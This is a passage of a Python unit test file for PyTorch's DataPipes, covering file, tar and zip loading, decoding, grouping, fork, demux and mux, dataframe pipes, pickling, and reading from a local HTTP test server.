# test import datapipe class directly
from torch.utils.data.datapipes.iter import (
FileLister,
FileLoader,
)
temp_dir = self.temp_dir.name
datapipe1 = FileLister(temp_dir, '')
datapipe2 = FileLoader(datapipe1)
count = 0
for rec in datapipe2:
count = count + 1
self.assertTrue(rec[0] in self.temp_files)
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
self.assertEqual(count, len(self.temp_files))
def test_readfilesfromtar_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
tar.add(self.temp_files[0])
tar.add(self.temp_files[1])
tar.add(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
# Test Case: Read extracted files before reaching the end of the tarfile
for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
# Test Case: Read extracted files after reaching the end of the tarfile
data_refs = list(datapipe3)
self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
# Test Case: reset the DataPipe after reading part of it
n_elements_before_reset = 1
res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe3, n_elements_before_reset)
# Check result accumulated before reset
self.assertEqual(len(res_before_reset), n_elements_before_reset)
for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_before_reset[1].read(), f.read())
ele_before_reset[1].close()
# Check result accumulated after reset
self.assertEqual(len(res_after_reset), len(self.temp_files))
for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_after_reset[1].read(), f.read())
ele_after_reset[1].close()
    # This test throws a warning because the data_stream inside ZipArchiveReader cannot be closed
    # due to the way zipfile.ZipFile.open() is implemented
def test_readfilesfromzip_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_zipfile_pathname = os.path.join(temp_dir, "test_zip.zip")
with zipfile.ZipFile(temp_zipfile_pathname, 'w') as myzip:
myzip.write(self.temp_files[0])
myzip.write(self.temp_files[1])
myzip.write(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.zip')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.ZipArchiveReader(datapipe2)
# Test Case: read extracted files before reaching the end of the zipfile
for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
        # Test Case: read extracted files after reaching the end of the zipfile
data_refs = list(datapipe3)
self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
# Test Case: reset the DataPipe after reading part of it
n_elements_before_reset = 1
res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe3, n_elements_before_reset)
# Check the results accumulated before reset
self.assertEqual(len(res_before_reset), n_elements_before_reset)
for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_before_reset[1].read(), f.read())
ele_before_reset[1].close()
# Check the results accumulated after reset
self.assertEqual(len(res_after_reset), len(self.temp_files))
for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_after_reset[1].read(), f.read())
ele_after_reset[1].close()
def test_routeddecoder_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_pngfile_pathname = os.path.join(temp_dir, "test_png.png")
png_data = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
np.save(temp_pngfile_pathname, png_data)
datapipe1 = dp.iter.FileLister(temp_dir, ['*.png', '*.txt'])
datapipe2 = dp.iter.FileLoader(datapipe1)
def _png_decoder(extension, data):
if extension != 'png':
return None
return np.load(data)
def _helper(prior_dp, dp, channel_first=False):
# Byte stream is not closed
for inp in prior_dp:
self.assertFalse(inp[1].closed)
for inp, rec in zip(prior_dp, dp):
ext = os.path.splitext(rec[0])[1]
if ext == '.png':
expected = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
if channel_first:
expected = expected.transpose(2, 0, 1)
self.assertEqual(rec[1], expected)
else:
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1], f.read().decode('utf-8'))
# Corresponding byte stream is closed by Decoder
self.assertTrue(inp[1].closed)
cached = list(datapipe2)
datapipe3 = dp.iter.RoutedDecoder(cached, _png_decoder)
datapipe3.add_handler(decoder_basichandlers)
_helper(cached, datapipe3)
cached = list(datapipe2)
datapipe4 = dp.iter.RoutedDecoder(cached, decoder_basichandlers)
datapipe4.add_handler(_png_decoder)
_helper(cached, datapipe4, channel_first=True)
def test_groupby_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
file_list = [
"a.png", "b.png", "c.json", "a.json", "c.png", "b.json", "d.png",
"d.json", "e.png", "f.json", "g.png", "f.png", "g.json", "e.json",
"h.txt", "h.json"]
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
for file_name in file_list:
file_pathname = os.path.join(temp_dir, file_name)
with open(file_pathname, 'w') as f:
f.write('12345abcde')
tar.add(file_pathname)
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
def group_fn(data):
filepath, _ = data
return os.path.basename(filepath).split(".")[0]
datapipe4 = dp.iter.Grouper(datapipe3, group_key_fn=group_fn, group_size=2)
def order_fn(data):
data.sort(key=lambda f: f[0], reverse=True)
return data
datapipe5 = dp.iter.Mapper(datapipe4, fn=order_fn) # type: ignore[var-annotated]
expected_result = [
("a.png", "a.json"), ("c.png", "c.json"), ("b.png", "b.json"), ("d.png", "d.json"),
("f.png", "f.json"), ("g.png", "g.json"), ("e.png", "e.json"), ("h.txt", "h.json")]
count = 0
for rec, expected in zip(datapipe5, expected_result):
count = count + 1
self.assertEqual(os.path.basename(rec[0][0]), expected[0])
self.assertEqual(os.path.basename(rec[1][0]), expected[1])
for i in [0, 1]:
self.assertEqual(rec[i][1].read(), b'12345abcde')
rec[i][1].close()
self.assertEqual(count, 8)
def test_demux_mux_datapipe(self):
numbers = NumbersDataset(10)
n1, n2 = numbers.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
numbers = NumbersDataset(10)
n1, n2, n3 = numbers.demux(3, lambda x: x % 3)
n = n1.mux(n2, n3)
self.assertEqual(list(range(10)), list(n))
# Test Case: Uneven DataPipes
source_numbers = list(range(0, 10)) + [10, 12]
numbers_dp = dp.iter.IterableWrapper(source_numbers)
n1, n2 = numbers_dp.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8, 10, 12], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
n = n1.mux(n2)
self.assertEqual(source_numbers, list(n))
@suppress_warnings # Suppress warning for lambda fn
def test_map_with_col_file_handle_datapipe(self):
temp_dir = self.temp_dir.name
datapipe1 = dp.iter.FileLister(temp_dir, '')
datapipe2 = dp.iter.FileLoader(datapipe1)
def _helper(datapipe):
dp1 = datapipe.map(lambda x: x.read(), input_col=1)
dp2 = datapipe.map(lambda x: (x[0], x[1].read()))
self.assertEqual(list(dp1), list(dp2))
# tuple
_helper(datapipe2)
# list
datapipe3 = datapipe2.map(lambda x: list(x))
_helper(datapipe3)
class TestDataFramesPipes(TestCase):
"""
    Most of these tests will fail if pandas is installed but dill is not available.
Need to rework them to avoid multiple skips.
"""
def _get_datapipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3))
def _get_dataframes_pipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3)) \
._to_dataframes_pipe(
columns=['i', 'j'],
dataframe_size=dataframe_size)
@skipIfNoDataFrames
@skipIfNoDill # TODO(VitalyFedyunin): Decouple tests from dill by avoiding lambdas in map
def test_capture(self):
dp_numbers = self._get_datapipe().map(lambda x: (x[0], x[1], x[1] + 3 * x[0]))
df_numbers = self._get_dataframes_pipe()
df_numbers['k'] = df_numbers['j'] + df_numbers.i * 3
self.assertEqual(list(dp_numbers), list(df_numbers))
@skipIfNoDataFrames
@skipIfNoDill
def test_shuffle(self):
        # With non-zero (but extremely low) probability (when the shuffle happens to change nothing),
        # this test fails, so feel free to restart it
df_numbers = self._get_dataframes_pipe(range=1000).shuffle()
dp_numbers = self._get_datapipe(range=1000)
df_result = [tuple(item) for item in df_numbers]
self.assertNotEqual(list(dp_numbers), df_result)
self.assertEqual(list(dp_numbers), sorted(df_result))
@skipIfNoDataFrames
@skipIfNoDill
def test_batch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8)
df_numbers_list = list(df_numbers)
last_batch = df_numbers_list[-1]
self.assertEqual(4, len(last_batch))
unpacked_batch = [tuple(row) for row in last_batch]
self.assertEqual([(96, 0), (97, 1), (98, 2), (99, 0)], unpacked_batch)
@skipIfNoDataFrames
@skipIfNoDill
def test_unbatch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8).batch(3)
dp_numbers = self._get_datapipe(range=100)
self.assertEqual(list(dp_numbers), list(df_numbers.unbatch(2)))
@skipIfNoDataFrames
@skipIfNoDill
def test_filter(self):
df_numbers = self._get_dataframes_pipe(range=10).filter(lambda x: x.i > 5)
self.assertEqual([(6, 0), (7, 1), (8, 2), (9, 0)], list(df_numbers))
class FileLoggerSimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, logfile=None, **kwargs):
self.__loggerHandle = None
if logfile is not None:
self.__loggerHandle = open(logfile, 'a+')
super().__init__(*args, **kwargs)
def log_message(self, format, *args):
if self.__loggerHandle is not None:
self.__loggerHandle.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
return
def finish(self):
if self.__loggerHandle is not None:
self.__loggerHandle.close()
super().finish()
def setUpLocalServerInThread():
try:
Handler = partial(FileLoggerSimpleHTTPRequestHandler, logfile=None)
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(("", 0), Handler)
server_addr = "{host}:{port}".format(host=server.server_address[0], port=server.server_address[1])
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
# Wait a bit for the server to come up
time.sleep(3)
return (server_thread, server_addr, server)
except Exception:
raise
def create_temp_files_for_serving(tmp_dir, file_count, file_size,
file_url_template):
furl_local_file = os.path.join(tmp_dir, "urls_list")
with open(furl_local_file, 'w') as fsum:
for i in range(0, file_count):
f = os.path.join(tmp_dir, "webfile_test_{num}.data".format(num=i))
write_chunk = 1024 * 1024 * 16
rmn_size = file_size
while rmn_size > 0:
with open(f, 'ab+') as fout:
fout.write(os.urandom(min(rmn_size, write_chunk)))
rmn_size = rmn_size - min(rmn_size, write_chunk)
fsum.write(file_url_template.format(num=i))
class TestIterableDataPipeHttp(TestCase):
__server_thread: threading.Thread
__server_addr: str
__server: socketserver.TCPServer
@classmethod
def setUpClass(cls):
try:
(cls.__server_thread, cls.__server_addr,
cls.__server) = setUpLocalServerInThread()
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not set up due to {0}".format(str(e)))
@classmethod
def tearDownClass(cls):
try:
cls.__server.shutdown()
cls.__server_thread.join(timeout=15)
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not tear down (clean up temp directory or terminate\
local server) due to {0}".format(str(e)))
def _http_test_base(self, test_file_size, test_file_count, timeout=None,
chunk=None):
def _get_data_from_tuple_fn(data, *args, **kwargs):
return data[args[0]]
with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:
# create tmp dir and files for test
base_tmp_dir = os.path.basename(os.path.normpath(tmpdir))
file_url_template = ("http://{server_addr}/{tmp_dir}/"
"/webfile_test_{num}.data\n")\
.format(server_addr=self.__server_addr, tmp_dir=base_tmp_dir,
num='{num}')
create_temp_files_for_serving(tmpdir, test_file_count,
test_file_size, file_url_template)
datapipe_dir_f = dp.iter.FileLister(tmpdir, '*_list')
datapipe_stream = dp.iter.FileLoader(datapipe_dir_f)
datapipe_f_lines = dp.iter.LineReader(datapipe_stream)
datapipe_line_url: IterDataPipe[str] = \
dp.iter.Mapper(datapipe_f_lines, _get_data_from_tuple_fn, (1,))
datapipe_http = dp.iter.HttpReader(datapipe_line_url,
timeout=timeout)
datapipe_tob = dp.iter.StreamReader(datapipe_http, chunk=chunk)
for (url, data) in datapipe_tob:
self.assertGreater(len(url), 0)
self.assertRegex(url, r'^http://.+\d+.data$')
if chunk is not None:
self.assertEqual(len(data), chunk)
else:
self.assertEqual(len(data), test_file_size)
@unittest.skip("Stress test on large amount of files skipped\
due to the CI timing constraint.")
def test_stress_http_reader_iterable_datapipes(self):
test_file_size = 10
# STATS: It takes about 5 hours to stress test 16 * 1024 * 1024
# files locally
test_file_count = 1024
self._http_test_base(test_file_size, test_file_count)
@unittest.skip("Test on the very large file skipped\
due to the CI timing constraint.")
def test_large_files_http_reader_iterable_datapipes(self):
# STATS: It takes about 11 mins to test a large file of 64GB locally
test_file_size = 1024 * 1024 * 128
test_file_count = 1
timeout = 30
chunk = 1024 * 1024 * 8
self._http_test_base(test_file_size, test_file_count, timeout=timeout,
chunk=chunk)
class IDP_NoLen(IterDataPipe):
def __init__(self, input_dp):
super().__init__()
self.input_dp = input_dp
# Prevent in-place modification
def __iter__(self):
input_dp = self.input_dp if isinstance(self.input_dp, IterDataPipe) else copy.deepcopy(self.input_dp)
for i in input_dp:
yield i
def _fake_fn(data):
return data
def _fake_add(constant, data):
return constant + data
def _fake_filter_fn(data):
return data >= 5
def _fake_filter_fn_constant(constant, data):
return data >= constant
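# The _fake_* helpers above are module-level (hence picklable) stand-ins for the
# lambdas used elsewhere; _test_picklable relies on them to build datapipes that
# can be serialized without the lambda-pickle warning.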
def _worker_init_fn(worker_id):
random.seed(123)
class TestFunctionalIterDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (), {}),
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (_fake_fn, (0, )), {}),
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (partial(_fake_add, 1), (0,)), {}),
(dp.iter.Collator, dp.iter.IterableWrapper(arr), (), {}),
(dp.iter.Collator, dp.iter.IterableWrapper(arr), (_fake_fn, (0, )), {}),
(dp.iter.Filter, dp.iter.IterableWrapper(arr), (_fake_filter_fn, (0, )), {}),
(dp.iter.Filter, dp.iter.IterableWrapper(arr), (partial(_fake_filter_fn, 5), (0,)), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (lambda x: x, ), {}),
(dp.iter.Collator, dp.iter.IterableWrapper(arr), (lambda x: x, ), {}),
(dp.iter.Filter, dp.iter.IterableWrapper(arr), (lambda x: x >= 5, ), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_iterable_wrapper_datapipe(self):
input_ls = list(range(10))
input_dp = dp.iter.IterableWrapper(input_ls)
# Functional Test: values are unchanged and in the same order
self.assertEqual(input_ls, list(input_dp))
# Functional Test: deep copy by default when an iterator is initialized (first element is read)
it = iter(input_dp)
self.assertEqual(0, next(it)) # The deep copy only happens when the first element is read
input_ls.append(50)
self.assertEqual(list(range(1, 10)), list(it))
# Functional Test: shallow copy
input_ls2 = [1, 2, 3]
input_dp_shallow = dp.iter.IterableWrapper(input_ls2, deepcopy=False)
input_ls2.append(10)
self.assertEqual([1, 2, 3, 10], list(input_dp_shallow))
# Reset Test: reset the DataPipe
input_ls = list(range(10))
input_dp = dp.iter.IterableWrapper(input_ls)
n_elements_before_reset = 5
res_before_reset, res_after_reset = reset_after_n_next_calls(input_dp, n_elements_before_reset)
self.assertEqual(input_ls[:n_elements_before_reset], res_before_reset)
self.assertEqual(input_ls, res_after_reset)
# __len__ Test: inherits length from sequence
self.assertEqual(len(input_ls), len(input_dp))
def test_concat_datapipe(self):
input_dp1 = dp.iter.IterableWrapper(range(10))
input_dp2 = dp.iter.IterableWrapper(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.iter.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `IterDataPipe`"):
dp.iter.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
# Test Reset
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
input_dp_nl = IDP_NoLen(range(5))
concat_dp = input_dp1.concat(input_dp_nl)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(concat_dp)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_fork_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
with self.assertRaises(ValueError):
input_dp.fork(num_instances=0)
dp0 = input_dp.fork(num_instances=1)
self.assertEqual(dp0, input_dp)
        # Test Case: making sure all child DataPipes share the same reference
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertTrue(all(n1 is n2 and n1 is n3 for n1, n2, n3 in zip(dp1, dp2, dp3)))
        # Test Case: each child DataPipe yields all of its values, one child at a time
output1, output2, output3 = list(dp1), list(dp2), list(dp3)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
self.assertEqual(list(range(10)), output3)
        # Test Case: two child DataPipes yield values together
dp1, dp2 = input_dp.fork(num_instances=2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
        # Test Case: one child DataPipe tries to yield all values first, but buffer_size = 5 is too small
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=5)
it1 = iter(dp1)
for _ in range(5):
next(it1)
with self.assertRaises(BufferError):
next(it1)
with self.assertRaises(BufferError):
list(dp2)
        # Test Case: one child DataPipe yields all values first with an unlimited buffer
with warnings.catch_warnings(record=True) as wa:
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=-1)
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Unlimited buffer size is set")
l1, l2 = list(dp1), list(dp2)
for d1, d2 in zip(l1, l2):
self.assertEqual(d1, d2)
        # Test Case: two child DataPipes yield values together with buffer size 1
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=1)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
# Test Case: make sure logic related to slowest_ptr is working properly
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
        output1, output2, output3 = [], [], []
for i, (n1, n2) in enumerate(zip(dp1, dp2)):
output1.append(n1)
output2.append(n2)
if i == 4: # yield all of dp3 when halfway through dp1, dp2
output3 = list(dp3)
break
self.assertEqual(list(range(5)), output1)
self.assertEqual(list(range(5)), output2)
self.assertEqual(list(range(10)), output3)
# Test Case: DataPipe doesn't reset if this pipe hasn't been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output2 = []
for i, n2 in enumerate(i2):
output2.append(n2)
if i == 4:
i1 = iter(dp1) # Doesn't reset because i1 hasn't been read
self.assertEqual(list(range(10)), output2)
        # Test Case: DataPipe resets when some of it has been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output1, output2 = [], []
for i, (n1, n2) in enumerate(zip(i1, i2)):
output1.append(n1)
output2.append(n2)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Reset both all child DataPipe
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)) + list(range(10)), output1)
self.assertEqual(list(range(5)) + list(range(10)), output2)
# Test Case: DataPipe reset, even when some other child DataPipes are not read
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(10)), list(dp1)) # Resets even though dp3 has not been read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output3 = []
for i, n3 in enumerate(dp3):
output3.append(n3)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
output1 = list(dp1) # Resets even though dp3 is only partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)), output3)
self.assertEqual(list(range(10)), output1)
break
self.assertEqual(list(range(10)), list(dp3)) # dp3 has to read from the start again
# Test Case: Each DataPipe inherits the source datapipe's length
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertEqual(len(input_dp), len(dp1))
self.assertEqual(len(input_dp), len(dp2))
self.assertEqual(len(input_dp), len(dp3))
# Pickle Test:
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
traverse(dp1) # This should not raise any error
for _ in zip(dp1, dp2, dp3):
pass
traverse(dp2) # This should not raise any error either
def test_mux_datapipe(self):
# Functional Test: Elements are yielded one at a time from each DataPipe, until they are all exhausted
input_dp1 = dp.iter.IterableWrapper(range(4))
input_dp2 = dp.iter.IterableWrapper(range(4, 8))
input_dp3 = dp.iter.IterableWrapper(range(8, 12))
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Functional Test: Uneven input Data Pipes
input_dp1 = dp.iter.IterableWrapper([1, 2, 3, 4])
input_dp2 = dp.iter.IterableWrapper([10])
input_dp3 = dp.iter.IterableWrapper([100, 200, 300])
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [1, 10, 100, 2, 200, 3, 300, 4]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Functional Test: Empty Data Pipe
input_dp1 = dp.iter.IterableWrapper([0, 1, 2, 3])
input_dp2 = dp.iter.IterableWrapper([])
output_dp = input_dp1.mux(input_dp2)
self.assertEqual(len(input_dp1), len(output_dp))
self.assertEqual(list(input_dp1), list(output_dp))
# __len__ Test: raises TypeError when __len__ is called and an input doesn't have __len__
input_dp1 = dp.iter.IterableWrapper(range(10))
input_dp_no_len = IDP_NoLen(range(10))
output_dp = input_dp1.mux(input_dp_no_len)
with self.assertRaises(TypeError):
len(output_dp)
def test_demux_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
with self.assertRaises(ValueError):
input_dp.demux(num_instances=0, classifier_fn=lambda x: 0)
# Test Case: split into 2 DataPipes and output them one at a time
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(0, 10, 2)), output1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: split into 2 DataPipes and output them together
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i + 1) for i in range(0, 10, 2)], output)
        # Test Case: values of the same classification are lumped together, and buffer_size = 4 is too small
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=4)
it1 = iter(dp1)
with self.assertRaises(BufferError):
            next(it1)  # Buffer raises because the first 5 elements all belong to a different child
with self.assertRaises(BufferError):
list(dp2)
# Test Case: values of the same classification are lumped together, and buffer_size = 5 is just enough
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=5)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(5, 10)), output1)
self.assertEqual(list(range(0, 5)), output2)
# Test Case: values of the same classification are lumped together, and unlimited buffer
with warnings.catch_warnings(record=True) as wa:
dp1, dp2 = input_dp.demux(
num_instances=2,
classifier_fn=lambda x: 0 if x >= 5 else 1,
buffer_size=-1
)
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Unlimited buffer size is set")
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(5, 10)), output1)
self.assertEqual(list(range(0, 5)), output2)
        # Test Case: classifier returns a value outside of [0, num_instances - 1]
dp0 = input_dp.demux(num_instances=1, classifier_fn=lambda x: x % 2)
it = iter(dp0[0])
with self.assertRaises(ValueError):
next(it)
next(it)
# Test Case: DataPipe doesn't reset when it has not been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
i1 = iter(dp1)
output2 = []
i = 0
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 4:
i1 = iter(dp1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: DataPipe reset when some of it has been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = [], []
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
if n1 == 4:
break
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Reset all child DataPipes
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
self.assertEqual([0, 2, 4] + list(range(0, 10, 2)), output1)
self.assertEqual([1, 3, 5] + list(range(1, 10, 2)), output2)
# Test Case: DataPipe reset, even when not all child DataPipes are exhausted
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1 = list(dp1)
self.assertEqual(list(range(0, 10, 2)), output1)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Reset even when dp2 is not read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output2 = []
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 1:
self.assertEqual(list(range(1, 5, 2)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Can reset even when dp2 is partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
break
output2 = list(dp2) # output2 has to read from beginning again
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: drop_none = True
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=True)
self.assertEqual([2, 4, 6, 8], list(dp1))
self.assertEqual([1, 3, 7, 9], list(dp2))
# Test Case: drop_none = False
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=False)
it1 = iter(dp1)
with self.assertRaises(ValueError):
next(it1)
# Test Case: __len__ not implemented
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
with self.assertRaises(TypeError):
len(dp1) # It is not implemented as we do not know length for each child in advance
with self.assertRaises(TypeError):
len(dp2)
# Pickle Test:
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=odd_or_even)
traverse(dp1) # This should not raise any error
for _ in zip(dp1, dp2):
pass
traverse(dp2) # This should not raise any error either
def test_map_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
